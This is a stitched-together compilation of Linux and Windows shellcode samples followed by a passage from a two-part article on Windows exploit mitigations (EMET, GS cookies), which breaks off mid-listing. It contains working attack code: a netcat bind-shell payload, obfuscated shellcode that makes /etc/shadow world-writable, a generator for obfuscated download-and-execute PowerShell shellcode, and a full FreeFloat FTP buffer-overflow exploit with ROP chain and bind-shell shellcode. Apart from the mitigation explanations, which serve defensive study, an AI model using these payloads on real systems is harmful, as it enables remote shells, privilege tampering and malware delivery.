"\x31\xc0\x31\xd2\x50\x68\x37\x37\x37\x31\x68\x2d\x76\x70\x31\x89\xe6\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x68\x2d\x6c\x65\x2f\x89\xe7\x50\x68\x2f\x2f\x6e\x63\x68\x2f\x62\x69\x6e\x89\xe3\x52\x56\x57\x53\x89\xe1\xb0\x0b\xcd\x80"; main() { printf("Shellcode Length: %d\n",strlen(shellcode)); int (*ret)() = (int(*)())shellcode; ret(); } Source
-
/* ; Title: Linux/x86 execve "/bin/sh" - shellcode 35 bytes ; Platform: linux/x86_64 ; Date: 2014-06-26 ; Author: Mohammad Reza Espargham ; Simple ShellCode section .text: 08048060 <_start>: 8048060: eb 17 jmp 8048079 08048062 : 8048062: 5e pop %esi 8048063: 31 d2 xor %edx,%edx 8048065: 52 push %edx 8048066: 56 push %esi 8048067: 89 e1 mov %esp,%ecx 8048069: 89 f3 mov %esi,%ebx 804806b: 31 c0 xor %eax,%eax 804806d: b0 0b mov $0xb,%al 804806f: cd 80 int $0x80 8048071: 31 db xor %ebx,%ebx 8048073: 31 c0 xor %eax,%eax 8048075: 40 inc %eax 8048076: cd 80 int $0x80 08048078 : 8048078: e8 e5 ff ff ff call 8048062 804807d: 2f das 804807e: 62 69 6e bound %ebp,0x6e(%ecx) 8048081: 2f das 8048082: 73 68 jae 80480ec */ #include <stdio.h> #include <string.h> #include <sys/mman.h> #define PAGE_SIZE 4096U char code[] = { "\xeb\x16\x5e\x31\xd2\x52\x56\x89\xe1\x89\xf3\x31\xc0\xb0\x0b\xcd" "\x80\x31\xdb\x31\xc0\x40\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69" "\x6e\x2f\x73\x68" }; int main() { printf("Shellcode Length: %d\n", (int)strlen(code)); int (*ret)() = (int(*)())code; ret(); return 0; } Source
-
/* * Linux x86 - execve chmod 0777 /etc/shadow * Obfuscated version - 84 bytes * Original: http://shell-storm.org/shellcode/files/shellcode-828.php * Author: xmgv * Details: https://xmgv.wordpress.com/2015/03/13/slae-6-polymorphic-shellcode/ */ /* global _start section .text _start: sub edx, edx push edx mov eax, 0xb33fb33f sub eax, 0x3bd04ede push eax jmp short two end: int 0x80 four: push edx push esi push ebp push ebx mov ecx, esp push byte 0xc pop eax dec eax jmp short end three: push edx sub eax, 0x2c3d2dff push eax mov ebp, esp push edx add eax, 0x2d383638 push eax sub eax, 0x013ffeff push eax sub eax, 0x3217d6d2 add eax, 0x31179798 push eax mov ebx, esp jmp short four two: sub eax, 0x0efc3532 push eax sub eax, 0x04feca01 inc eax push eax mov esi, esp jmp short three */ #include <stdio.h> #include <string.h> unsigned char code[] = "\x29\xd2\x52\xb8\x3f\xb3\x3f\xb3\x2d\xde\x4e\xd0\x3b\x50\xeb\x33\xcd\x80" "\x52\x56\x55\x53\x89\xe1\x6a\x0c\x58\x48\xeb\xf2\x52\x2d\xff\x2d\x3d\x2c" "\x50\x89\xe5\x52\x05\x38\x36\x38\x2d\x50\x2d\xff\xfe\x3f\x01\x50\x2d\xd2" "\xd6\x17\x32\x05\x98\x97\x17\x31\x50\x89\xe3\xeb\xcf\x2d\x32\x35\xfc\x0e" "\x50\x2d\x01\xca\xfe\x04\x40\x50\x89\xe6\xeb\xca"; int main() { printf("Shellcode Length: %d\n", strlen(code)); int (*ret)() = (int(*)())code; ret(); }
-
#Title: Obfuscated Shellcode Windows x86/x64 Download And Execute [use PowerShell] - Generator#length: Dynamic ! depend on url and filename #Date: 20 January 2015 #Author: Ali Razmjoo #tested On: Windows 7 x64 ultimate #WinExec => 0x77b1e695 #ExitProcess => 0x77ae2acf #==================================== #Execute : #powershell -command "& { (New-Object Net.WebClient).DownloadFile('http://tartarus.org/~simon/putty-prerel-snapshots/x86/putty.exe', 'D:\Ali.exe')};D:\Ali.exe" #==================================== #Ali Razmjoo , ['Ali.Razmjoo1994@Gmail.Com','Ali@Z3r0D4y.Com'] #Thanks to my friends , Dariush Nasirpour and Ehsan Nezami #################################################### #How it work ? ''' C:\Users\Ali\Desktop>python "Windows x86 Download And Execute.py" Enter url Example: http://z3r0d4y.com/file.exe Enter:http://tartarus.org/~simon/putty-prerel-snapshots/x86/putty.exe Enter filename Example: D:\file.exe Enter:C:\Ali.exe C:\Users\Ali\Desktop>nasm -f elf shellcode.asm -o shellcode.o C:\Users\Ali\Desktop>objdump -D shellcode.o shellcode.o: file format elf32-i386 Disassembly of section .text: 00000000 <.text>: 0: 31 c0 xor %eax,%eax 2: 50 push %eax 3: 68 41 41 65 22 push $0x22654141 8: 58 pop %eax 9: c1 e8 08 shr $0x8,%eax c: c1 e8 08 shr $0x8,%eax f: 50 push %eax 10: b8 34 47 0b 4d mov $0x4d0b4734,%eax 15: bb 5d 69 6e 35 mov $0x356e695d,%ebx 1a: 31 d8 xor %ebx,%eax 1c: 50 push %eax 1d: b8 43 32 10 22 mov $0x22103243,%eax 22: bb 79 6e 51 4e mov $0x4e516e79,%ebx 27: 31 d8 xor %ebx,%eax 29: 50 push %eax 2a: b8 60 05 42 32 mov $0x32420560,%eax 2f: bb 49 78 79 71 mov $0x71797849,%ebx 34: 31 d8 xor %ebx,%eax 36: 50 push %eax 37: b8 0f 1c 2c 14 mov $0x142c1c0f,%eax 3c: bb 6a 64 49 33 mov $0x3349646a,%ebx 41: 31 d8 xor %ebx,%eax 43: 50 push %eax 44: b8 07 3e 0b 40 mov $0x400b3e07,%eax 49: bb 46 52 62 6e mov $0x6e625246,%ebx 4e: 31 d8 xor %ebx,%eax 50: 50 push %eax 51: b8 44 0a 78 07 mov $0x7780a44,%eax 56: bb 63 49 42 5b mov $0x5b424963,%ebx 5b: 31 d8 xor %ebx,%eax 5d: 50 push %eax 5e: b8 0f 16 4b 0d mov $0xd4b160f,%eax 63: bb 6a 31 67 2d mov $0x2d67316a,%ebx 68: 31 d8 xor %ebx,%eax 6a: 50 push %eax 6b: b8 18 62 5c 1f mov $0x1f5c6218,%eax 70: bb 61 4c 39 67 mov $0x67394c61,%ebx 75: 31 d8 xor %ebx,%eax 77: 50 push %eax 78: b8 1b 2d 1e 1f mov $0x1f1e2d1b,%eax 7d: bb 6b 58 6a 6b mov $0x6b6a586b,%ebx 82: 31 d8 xor %ebx,%eax 84: 50 push %eax 85: b8 45 40 41 66 mov $0x66414045,%eax 8a: bb 3d 78 77 49 mov $0x4977783d,%ebx 8f: 31 d8 xor %ebx,%eax 91: 50 push %eax 92: b8 02 1f 4b 45 mov $0x454b1f02,%eax 97: bb 6d 6b 38 6a mov $0x6a386b6d,%ebx 9c: 31 d8 xor %ebx,%eax 9e: 50 push %eax 9f: b8 24 3e 19 32 mov $0x32193e24,%eax a4: bb 45 4e 6a 5a mov $0x5a6a4e45,%ebx a9: 31 d8 xor %ebx,%eax ab: 50 push %eax ac: b8 00 5e 3a 35 mov $0x353a5e00,%eax b1: bb 6c 73 49 5b mov $0x5b49736c,%ebx b6: 31 d8 xor %ebx,%eax b8: 50 push %eax b9: b8 1f 37 40 24 mov $0x2440371f,%eax be: bb 6d 52 32 41 mov $0x4132526d,%ebx c3: 31 d8 xor %ebx,%eax c5: 50 push %eax c6: b8 2e 35 68 31 mov $0x3168352e,%eax cb: bb 5a 4c 45 41 mov $0x41454c5a,%ebx d0: 31 d8 xor %ebx,%eax d2: 50 push %eax d3: b8 48 1e 1c 15 mov $0x151c1e48,%eax d8: bb 67 6e 69 61 mov $0x61696e67,%ebx dd: 31 d8 xor %ebx,%eax df: 50 push %eax e0: b8 26 28 0d 5d mov $0x5d0d2826,%eax e5: bb 4f 45 62 33 mov $0x3362454f,%ebx ea: 31 d8 xor %ebx,%eax ec: 50 push %eax ed: b8 20 57 1d 45 mov $0x451d5720,%eax f2: bb 47 78 63 36 mov $0x36637847,%ebx f7: 31 d8 xor %ebx,%eax f9: 50 push %eax fa: b8 04 6a 24 3b mov $0x3b246a04,%eax ff: bb 77 44 4b 49 mov $0x494b4477,%ebx 104: 31 d8 xor %ebx,%eax 106: 50 push %eax 107: b8 18 0f 0a 32 mov $0x320a0f18,%eax 10c: bb 6c 6e 78 47 mov $0x47786e6c,%ebx 111: 31 d8 xor %ebx,%eax 113: 50 push %eax 114: b8 7d 18 3c 27 mov $0x273c187d,%eax 119: bb 52 6c 5d 55 mov $0x555d6c52,%ebx 11e: 31 d8 xor %ebx,%eax 120: 50 push %eax 121: b8 03 44 60 60 mov $0x60604403,%eax 126: bb 77 34 5a 4f mov $0x4f5a3477,%ebx 12b: 31 d8 xor %ebx,%eax 12d: 50 push %eax 12e: b8 47 6b 1f 20 mov $0x201f6b47,%eax 133: bb 6f 4c 77 54 mov $0x54774c6f,%ebx 138: 31 d8 xor %ebx,%eax 13a: 50 push %eax 13b: b8 2a 5e 2b 20 mov $0x202b5e2a,%eax 140: bb 6c 37 47 45 mov $0x4547376c,%ebx 145: 31 d8 xor %ebx,%eax 147: 50 push %eax 148: b8 59 07 12 0e mov $0xe120759,%eax 14d: bb 35 68 73 6a mov $0x6a736835,%ebx 152: 31 d8 xor %ebx,%eax 154: 50 push %eax 155: b8 01 59 11 2c mov $0x2c115901,%eax 15a: bb 45 36 66 42 mov $0x42663645,%ebx 15f: 31 d8 xor %ebx,%eax 161: 50 push %eax 162: b8 22 22 4e 5a mov $0x5a4e2222,%eax 167: bb 4c 56 67 74 mov $0x7467564c,%ebx 16c: 31 d8 xor %ebx,%eax 16e: 50 push %eax 16f: b8 00 37 1b 48 mov $0x481b3700,%eax 174: bb 43 5b 72 2d mov $0x2d725b43,%ebx 179: 31 d8 xor %ebx,%eax 17b: 50 push %eax 17c: b8 4a 1f 22 13 mov $0x13221f4a,%eax 181: bb 64 48 47 71 mov $0x71474864,%ebx 186: 31 d8 xor %ebx,%eax 188: 50 push %eax 189: b8 6a 23 03 18 mov $0x1803236a,%eax 18e: bb 4a 6d 66 6c mov $0x6c666d4a,%ebx 193: 31 d8 xor %ebx,%eax 195: 50 push %eax 196: b8 2d 54 57 1c mov $0x1c57542d,%eax 19b: bb 47 31 34 68 mov $0x68343147,%ebx 1a0: 31 d8 xor %ebx,%eax 1a2: 50 push %eax 1a3: b8 4e 15 36 5a mov $0x5a36154e,%eax 1a8: bb 39 38 79 38 mov $0x38793839,%ebx 1ad: 31 d8 xor %ebx,%eax 1af: 50 push %eax 1b0: b8 59 7f 1f 04 mov $0x41f7f59,%eax 1b5: bb 79 57 51 61 mov $0x61515779,%ebx 1ba: 31 d8 xor %ebx,%eax 1bc: 50 push %eax 1bd: b8 47 56 1d 2f mov $0x2f1d5647,%eax 1c2: bb 65 70 3d 54 mov $0x543d7065,%ebx 1c7: 31 d8 xor %ebx,%eax 1c9: 50 push %eax 1ca: b8 2c 18 08 54 mov $0x5408182c,%eax 1cf: bb 4d 76 6c 74 mov $0x746c764d,%ebx 1d4: 31 d8 xor %ebx,%eax 1d6: 50 push %eax 1d7: b8 5a 34 58 1b mov $0x1b58345a,%eax 1dc: bb 39 5b 35 76 mov $0x76355b39,%ebx 1e1: 31 d8 xor %ebx,%eax 1e3: 50 push %eax 1e4: b8 3f 0f 4b 41 mov $0x414b0f3f,%eax 1e9: bb 53 63 6b 6c mov $0x6c6b6353,%ebx 1ee: 31 d8 xor %ebx,%eax 1f0: 50 push %eax 1f1: b8 4a 1e 59 0b mov $0xb591e4a,%eax 1f6: bb 38 6d 31 6e mov $0x6e316d38,%ebx 1fb: 31 d8 xor %ebx,%eax 1fd: 50 push %eax 1fe: b8 49 2b 16 2a mov $0x2a162b49,%eax 203: bb 39 44 61 4f mov $0x4f614439,%ebx 208: 31 d8 xor %ebx,%eax 20a: 50 push %eax 20b: 89 e0 mov %esp,%eax 20d: bb 41 41 41 01 mov $0x1414141,%ebx 212: c1 eb 08 shr $0x8,%ebx 215: c1 eb 08 shr $0x8,%ebx 218: c1 eb 08 shr $0x8,%ebx 21b: 53 push %ebx 21c: 50 push %eax 21d: bb 95 e6 b1 77 mov $0x77b1e695,%ebx 222: ff d3 call *%ebx 224: bb cf 2a ae 77 mov $0x77ae2acf,%ebx 229: ff d3 call *%ebx C:\Users\Ali\Desktop> #you have your shellcode now ======================================= shellcode.c #include <stdio.h> #include <string.h> int main(){ unsigned char shellcode[]= "\x31\xc0\x50\x68\x41\x41\x65\x22\x58\xc1\xe8\x08\xc1\xe8\x08\x50\xb8\x34\x47\x0b\x4d\xbb\x5d\x69\x6e\x35\x31\xd8\x50\xb8\x43\x32\x10\x22\xbb\x79\x6e\x51\x4e\x31\xd8\x50\xb8\x60\x05\x42\x32\xbb\x49\x78\x79\x71\x31\xd8\x50\xb8\x0f\x1c\x2c\x14\xbb\x6a\x64\x49\x33\x31\xd8\x50\xb8\x07\x3e\x0b\x40\xbb\x46\x52\x62\x6e\x31\xd8\x50\xb8\x44\x0a\x78\x07\xbb\x63\x49\x42\x5b\x31\xd8\x50\xb8\x0f\x16\x4b\x0d\xbb\x6a\x31\x67\x2d\x31\xd8\x50\xb8\x18\x62\x5c\x1f\xbb\x61\x4c\x39\x67\x31\xd8\x50\xb8\x1b\x2d\x1e\x1f\xbb\x6b\x58\x6a\x6b\x31\xd8\x50\xb8\x45\x40\x41\x66\xbb\x3d\x78\x77\x49\x31\xd8\x50\xb8\x02\x1f\x4b\x45\xbb\x6d\x6b\x38\x6a\x31\xd8\x50\xb8\x24\x3e\x19\x32\xbb\x45\x4e\x6a\x5a\x31\xd8\x50\xb8\x00\x5e\x3a\x35\xbb\x6c\x73\x49\x5b\x31\xd8\x50\xb8\x1f\x37\x40\x24\xbb\x6d\x52\x32\x41\x31\xd8\x50\xb8\x2e\x35\x68\x31\xbb\x5a\x4c\x45\x41\x31\xd8\x50\xb8\x48\x1e\x1c\x15\xbb\x67\x6e\x69\x61\x31\xd8\x50\xb8\x26\x28\x0d\x5d\xbb\x4f\x45\x62\x33\x31\xd8\x50\xb8\x20\x57\x1d\x45\xbb\x47\x78\x63\x36\x31\xd8\x50\xb8\x04\x6a\x24\x3b\xbb\x77\x44\x4b\x49\x31\xd8\x50\xb8\x18\x0f\x0a\x32\xbb\x6c\x6e\x78\x47\x31\xd8\x50\xb8\x7d\x18\x3c\x27\xbb\x52\x6c\x5d\x55\x31\xd8\x50\xb8\x03\x44\x60\x60\xbb\x77\x34\x5a\x4f\x31\xd8\x50\xb8\x47\x6b\x1f\x20\xbb\x6f\x4c\x77\x54\x31\xd8\x50\xb8\x2a\x5e\x2b\x20\xbb\x6c\x37\x47\x45\x31\xd8\x50\xb8\x59\x07\x12\x0e\xbb\x35\x68\x73\x6a\x31\xd8\x50\xb8\x01\x59\x11\x2c\xbb\x45\x36\x66\x42\x31\xd8\x50\xb8\x22\x22\x4e\x5a\xbb\x4c\x56\x67\x74\x31\xd8\x50\xb8\x00\x37\x1b\x48\xbb\x43\x5b\x72\x2d\x31\xd8\x50\xb8\x4a\x1f\x22\x13\xbb\x64\x48\x47\x71\x31\xd8\x50\xb8\x6a\x23\x03\x18\xbb\x4a\x6d\x66\x6c\x31\xd8\x50\xb8\x2d\x54\x57\x1c\xbb\x47\x31\x34\x68\x31\xd8\x50\xb8\x4e\x15\x36\x5a\xbb\x39\x38\x79\x38\x31\xd8\x50\xb8\x59\x7f\x1f\x04\xbb\x79\x57\x51\x61\x31\xd8\x50\xb8\x47\x56\x1d\x2f\xbb\x65\x70\x3d\x54\x31\xd8\x50\xb8\x2c\x18\x08\x54\xbb\x4d\x76\x6c\x74\x31\xd8\x50\xb8\x5a\x34\x58\x1b\xbb\x39\x5b\x35\x76\x31\xd8\x50\xb8\x3f\x0f\x4b\x41\xbb\x53\x63\x6b\x6c\x31\xd8\x50\xb8\x4a\x1e\x59\x0b\xbb\x38\x6d\x31\x6e\x31\xd8\x50\xb8\x49\x2b\x16\x2a\xbb\x39\x44\x61\x4f\x31\xd8\x50\x89\xe0\xbb\x41\x41\x41\x01\xc1\xeb\x08\xc1\xeb\x08\xc1\xeb\x08\x53\x50\xbb\x95\xe6\xb1\x77\xff\xd3\xbb\xcf\x2a\xae\x77\xff\xd3"; fprintf(stdout,"Length: %d\n\n",strlen(shellcode)); (*(void(*)()) shellcode)(); } ======================================= C:\Users\Ali\Desktop>gcc shellcode.c -o shellcode.exe C:\Users\Ali\Desktop>shellcode.exe Length: 173 C:\Users\Ali\Desktop> #notice : when program exit, you must wait 2-3 second , it will finish download and execute file after 2-3 second ''' import random,binascii chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz123456789=[]-' p1 = '''xor eax,eax push eax ''' p2 = ''' mov eax,esp mov ebx,0x01414141 shr ebx,0x08 shr ebx,0x08 shr ebx,0x08 push ebx push eax mov ebx,0x77b1e695 call ebx mov ebx,0x77ae2acf call ebx ''' sen1 = str(raw_input('Enter url\nExample: http://z3r0d4y.com/file.exe \nEnter:')) sen1 = sen1.rsplit() sen1 = sen1[0] sen2 = str(raw_input('Enter filename\nExample: D:\\file.exe\nEnter:')) sen2 = sen2.rsplit() sen2 = sen2[0] sen = '''powershell -command "& { (New-Object Net.WebClient).DownloadFile('%s', '%s')};%s"''' %(sen1,sen2,sen2) m = 0 for word in sen: m += 1 m = m - 1 stack = '' while(m>=0): stack += sen[m] m -= 1 stack = stack.encode('hex') skip = 1 if len(stack) % 8 == 0: skip = 0 if skip is 1: stack = '00' + stack if len(stack) % 8 == 0: skip = 0 if skip is 1: stack = '00' + stack if len(stack) % 8 == 0: skip = 0 if skip is 1: stack = '00' + stack if len(stack) % 8 == 0: skip = 0 if len(stack) % 8 == 0: zxzxzxz = 0 m = len(stack) / 8 c = 0 n = 0 z = 8 shf = open('shellcode.asm','w') shf.write(p1) shf.close() shf = open('shellcode.asm','a') while(c<m): v = 'push 0x' + stack[n:z] skip = 0 if '0x000000' in v: skip = 1 q1 = v[13:] v = 'push 0x' + q1 + '414141' + '\n' + 'pop eax\nshr eax,0x08\nshr eax,0x08\nshr eax,0x08\npush eax\n' if '0x0000' in v: skip = 1 q1 = v[11:] v = 'push 0x' + q1 + '4141' + '\n' + 'pop eax\nshr eax,0x08\nshr eax,0x08\npush eax\n' if '0x00' in v: skip = 1 q1 = v[9:] v = 'push 0x' + q1 + '41' + '\n' + 'pop eax\nshr eax,0x08\npush eax\n' if skip is 1: shf.write(v) if skip is 0: v = v.rsplit() zzz = '' for w in v: if '0x' in w: zzz = str(w) s1 = binascii.b2a_hex(''.join(random.choice(chars) for i in range(4))) s1 = '0x%s'%s1 data = "%x" % (int(zzz, 16) ^ int(s1, 16)) v = 'mov eax,0x%s\nmov ebx,%s\nxor eax,ebx\npush eax\n'%(data,s1) shf.write(v) n += 8 z += 8 c += 1 shf.write(p2) shf.close()
-
In Part 1, we explained GS cookies and Safe SEH. If you haven’t read that part, it is highly recommended to read it first. The Enhanced Mitigation Experience Toolkit, or EMET, is rudimentally a shield or a shell that runs over Windows applications and protects them, regardless of how those applications have authentically been coded by their developer, to capitalize on security guards that are built into the Windows operating system. EMET is a wrapper that enables and enforces a set of protections that, when used together, genuinely enhance the security posture of a machine and greatly reduce the chance that exploits can run against your machine and cause any harm—most will simply fail to execute thoroughly. It is particularly auxiliary in guard against exploits that have not yet been patched by a software developer, making it a key implement that should be in your security arsenal. In this article we are going to explain EAF (Export Address Filtering), which prevents shellcode execution. This scenario comes into play if the attacker somehow has managed to bypass the previously mentioned exploit prevention mechanism. This technique will not let the attacker execute some important parts of the shellcode. It is an application-wide protection. It will inject EMET.dll inside the specified process for protection against shellcode execution. Shellcodes locate IAT using PEB.ldr. EAF prevents the access to this location. EMET.dll puts a hardware break point on read at PEB.Ldr and catches the exception using a Vectored Exception. This exception is the first handler, which means it will be called before any other Vectored Exception Handler. The handler will check if the faulty address is in the range other than loaded modules. In that way, the IAT parsing is prevented by EMET. The Vectored Exception Handler looks like this: In order to test it, we can use the following c file that mentions PEB.LDR in the code. __asm { xor edx, edx // zero edx mov edx, fs:[edx+0x30] // get a pointer to the PEB mov edx, [edx+0x0C] // get PEB->Ldr mov edx, [edx+0x14] // get the first module from the InMemoryOrder module list } This code chunk to get InMemoryOrder Module will fail under EAF. Heap spray protection The heap spraying technique has been used in browsers for so long now. Heap spraying is basically used to bypass ASLR (address space layout randomization). In this technique, a large chunk of data is allocated to a range where it is easy to predict the address. If we allocate a large buff, fill it with 0x04 only, and make it reach far beyond address 0x04040404, and after that, if we land at location 0x04040404, the following side effects would take place: MOV EAX,DWORD PTR DS:[ESI] << EAX == 0x04040404 CALL DWORD PTR DS:[EAX+10] << JMP 0x04040404 because [eax + 10] =0x04040404 Other NOP like behaving addresses are: 0x05050505 = ADD EAX,5050505 <<< acts as a NOP 0x0c0c0c0c = OR AL, 0C << also acts as a NOP 0x0d0d0d0d = OR EAX,0d0d0d0d EMET protects against heap spray by allocating memory at these regions and filling them with random data. Deep hooks This technique applies for ROP prevention. It prevents ROP attacks on a vulnerable application. The technique is predicated on the key observation that after exploitation it must use ROP code to leverage the attack, and in this process interact with system calls. Examples of such interaction include starting other processes, opening files, etc. Using this information, we can define a concept of critical function: A critical function is a function by executing which the attacker can modify system behavior, either by making modifications to the recollection or the current process. Some examples of critical functions include: 1 CreateProcess 2 VirtualProtect, VirtualAlloc, LoadLibrary – 3 OpenFile In order to exploit successfully, the ROP Code will require to call at least one critical function from the ROP code. Deep hooks utilize this observation to perform the checks only when one of the critical functions gets called: when a critical function gets called, the opportune checks will be performed to determine if the critical function was called from the ROP code or as a component of mundane program execution. It is quite important to note that ROPGuard does not contain a hardcoded list of critical functions. Instead, critical functions are defined in ROPGuard’s configuration file. In this way, critical functions can be integrated at any time to amend security and even process-categorical critical functions can be integrated. Similarly, critical functions can be abstracted in order to amend the performance of the system. It is additionally consequential to note that the current prototype bulwarks only the functions in the utilizer mode. To obviate the assailant from bypassing these functions, the same protections could be integrated to the kernel counterparts of the defined critical functions. In order to demonstrate that, we will use a ROP exploit on sample application protected using deep hooks. For a vulnerable application, we will use FreeFloat FTP Server Buffer Overflow Exploit (DEP Bypass) by blake. http://www.exploit-db.com/exploits/17886/ #!/usr/bin/python import socket, sys from struct import pack print "\n===============================" print "Freefloat FTP Server DEP Bypass" print " Written by Blake " print "===============================\n" target = "localhost" port = int("21") # 728 bytes for shellcode #Bind Shell shellcode port 4444 shellcode = ("\x31\xc9\xdb\xcd\xbb\xb3\x93\x96\x9d\xb1\x56\xd9\x74\x24\xf4" "\x5a\x31\x5a\x17\x83\xea\xfc\x03\x5a\x13\x51\x66\x6a\x75\x1c" "\x89\x93\x86\x7e\x03\x76\xb7\xac\x77\xf2\xea\x60\xf3\x56\x07" "\x0b\x51\x43\x9c\x79\x7e\x64\x15\x37\x58\x4b\xa6\xf6\x64\x07" "\x64\x99\x18\x5a\xb9\x79\x20\x95\xcc\x78\x65\xc8\x3f\x28\x3e" "\x86\x92\xdc\x4b\xda\x2e\xdd\x9b\x50\x0e\xa5\x9e\xa7\xfb\x1f" "\xa0\xf7\x54\x14\xea\xef\xdf\x72\xcb\x0e\x33\x61\x37\x58\x38" "\x51\xc3\x5b\xe8\xa8\x2c\x6a\xd4\x66\x13\x42\xd9\x77\x53\x65" "\x02\x02\xaf\x95\xbf\x14\x74\xe7\x1b\x91\x69\x4f\xef\x01\x4a" "\x71\x3c\xd7\x19\x7d\x89\x9c\x46\x62\x0c\x71\xfd\x9e\x85\x74" "\xd2\x16\xdd\x52\xf6\x73\x85\xfb\xaf\xd9\x68\x04\xaf\x86\xd5" "\xa0\xbb\x25\x01\xd2\xe1\x21\xe6\xe8\x19\xb2\x60\x7b\x69\x80" "\x2f\xd7\xe5\xa8\xb8\xf1\xf2\xcf\x92\x45\x6c\x2e\x1d\xb5\xa4" "\xf5\x49\xe5\xde\xdc\xf1\x6e\x1f\xe0\x27\x20\x4f\x4e\x98\x80" "\x3f\x2e\x48\x68\x2a\xa1\xb7\x88\x55\x6b\xce\x8f\x9b\x4f\x82" "\x67\xde\x6f\x34\x2b\x57\x89\x5c\xc3\x31\x01\xc9\x21\x66\x9a" "\x6e\x5a\x4c\xb6\x27\xcc\xd8\xd0\xf0\xf3\xd8\xf6\x52\x58\x70" "\x91\x20\xb2\x45\x80\x36\x9f\xed\xcb\x0e\x77\x67\xa2\xdd\xe6" "\x78\xef\xb6\x8b\xeb\x74\x47\xc2\x17\x23\x10\x83\xe6\x3a\xf4" "\x39\x50\x95\xeb\xc0\x04\xde\xa8\x1e\xf5\xe1\x31\xd3\x41\xc6" "\x21\x2d\x49\x42\x16\xe1\x1c\x1c\xc0\x47\xf7\xee\xba\x11\xa4" "\xb8\x2a\xe4\x86\x7a\x2d\xe9\xc2\x0c\xd1\x5b\xbb\x48\xed\x53" "\x2b\x5d\x96\x8e\xcb\xa2\x4d\x0b\xfb\xe8\xcc\x3d\x94\xb4\x84" "\x7c\xf9\x46\x73\x42\x04\xc5\x76\x3a\xf3\xd5\xf2\x3f\xbf\x51" "\xee\x4d\xd0\x37\x10\xe2\xd1\x1d\x1a") buffer = "\x41" * 230 eip = pack('<L',0x77F6100A) # RETN - shlwapi rop = "\x42" * 8 # compensate rop += pack('<L',0x5D09382C) # POP EBX, RETN - msvcirt rop += "\xff\xff\xff\xff" rop += pack('<L',0x77c127e1) # INC EBX, RETN rop += pack('<L',0x5d093466) # POP EBP, RETN rop += pack('<L',0x7c8622a4) # SetProcessDEPPolicy rop += pack('<L',0x5d095470) # POP EDI, RETN rop += pack('<L',0x5d095471) # RETN rop += pack('<L',0x5d0913b4) # POP ESI, RETN rop += pack('<L',0x5d095471) # RETN rop += pack('<L',0x77e7d102) # PUSHAD # RETN - RPCRT4 nops = "\x90" * 10 junk = "\x42" * (1000 - len(buffer + eip + rop + nops + shellcode)) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) print "[+] Connecting to %s on port %d" % (target,port) try: s.connect((target,port)) s.recv(1024) print "[+] Sending payload" s.send("USER " + buffer + eip + rop + nops + shellcode + junk + "\r\n") s.close() print "[+] Exploit successfully sent" except: print "[X] Unable to connect to %s" % target raw_input("[+] Press any key to exit\n") After applying deep hooks, the script fails to exploit. Source
-
The spree of exploits on Windows has led to the creation of a certain type of exploit protection mechanism on Windows. Protection from things like buffer overflow, heap overwrite and return originated exploits have been deployed on Windows compilers and OS. They can be either OS specific or compiler based protections. EMET can be used to apply some of these protections on Windows binaries. According to Microsoft: “The Enhanced Mitigation Experience Toolkit (EMET) is a utility that helps prevent vulnerabilities in software from being successfully exploited. EMET achieves this goal by using security mitigation technologies. These technologies function as special protections and obstacles that an exploit author must defeat to exploit software vulnerabilities. These security mitigation technologies do not guarantee that vulnerabilities cannot be exploited. However, they work to make exploitation as difficult as possible to perform.” Compiler protections included in MSVC are: /GF enable read-only string pooling /Gm[-] enable minimal rebuild /Gy[-] separate functions for linker /GS[-] enable security checks /GR[-] enable C++ RTTI /GX[-] enable C++ EH (same as /EHsc) /EHs enable C++ EH (no SEH exceptions) /EHa enable C++ EH (w/ SEH exceptions) /EHc extern "C" defaults to nothrow /Qfast_transcendentals generate inline FP intrinsics even with /fp:except /GL[-] enable link-time code generation /GA optimize for Windows Application /Ge force stack checking for all funcs /Gs[num] control stack checking calls /Gh enable _penter function call /GH enable _pexit function call /GT generate fiber-safe TLS accesses /RTC1 Enable fast checks (/RTCsu) /RTCc Convert to smaller type checks /RTCs Stack Frame runtime checking /RTCu Uninitialized local usage checks /clr[:option] compile for common language runtime, where option is: pure - produce IL-only output file (no native executable code) safe - produce IL-only verifiable output file oldSyntax - accept the Managed Extensions syntax from Visual C++ 2002/2003 initialAppDomain - enable initial AppDomain behavior of Visual C++ 2002 noAssembly - do not produce an assembly /Gd __cdecl calling convention /Gr __fastcall calling convention /Gz __stdcall calling convention /GZ Enable stack checks (/RTCs) /QIfist[-] use FIST instead of ftol() /hotpatch ensure function padding for hotpatchable images /arch:<SSE|SSE2|AVX> minimum CPU architecture requirements, one of: SSE - enable use of instructions available with SSE enabled CPUs SSE2 - enable use of instructions available with SSE2 enabled CPUs AVX - enable use of Intel(R) Advanced Vector Extensions instructions /Qimprecise_fwaits generate FWAITs only on "try" boundaries, not inside "try" /Qsafe_fp_loads generate safe FP loads So it makes exploitation difficult but does not ultimately protect against it. Stack-Based OverRun Detection (GS) This is the oldest and most famous protection available in Visual C++. The goal of the /GS compiler flag is simple: reduce the chance that maleficent code will execute correctly. The /GS option is on by default in Visual C++ 2003 and later, and it detects certain kinds of stack smash at run time. It goes about doing this by including a desultory number in a function’s stack just before the return address on the stack, and when the function returns, the function epilogue code checks this value to ascertain it has not transmuted. If the cookie, as it’s called, has been mutated, execution is halted. So GS stack cookie basically protects against tampering of return addresses. Now let’s go into detail how it works: Consider the following C code compiled using /GS parameter of Microsoft C compiler: #include void vuln() { unsigned char x[10] = {0}; int i = 0; while (i != 100) x[i++] = ‘A'; } int main(int argc, char **agrv) { vuln(); } If we compile it using MSVC switch /GS it would get the GS stack-based protection embedded. Let’s see what is added at the vuln function for GS stack protection. Stack Cookie Resides soon after Saved EBP i.e EBP-4 as shown in the IDA disassembly: As you can see in the beginning of the prologue of the function, the __security_cookie is retrieved and xored with EBP. So if the attacker had to overwrite the return address he needs to guess the __security_cookie as clearly we see that it will also get overwritten. Now let’s see how it is generated and if it contains enough randomness in order to be secure. This value is generated in ___security_init_cookie() function which looks like: ___security_init_cookie proc near ; CODE XREF: $LN26#p .text:0040267F .text:0040267F PerformanceCount= LARGE_INTEGER ptr -10h .text:0040267F SystemTimeAsFileTime= _FILETIME ptr -8 .text:0040267F .text:0040267F mov edi, edi .text:00402681 push ebp .text:00402682 mov ebp, esp .text:00402684 sub esp, 10h .text:00402687 mov eax, ___security_cookie .text:0040268C and [ebp+SystemTimeAsFileTime.dwLowDateTime], 0 .text:00402690 and 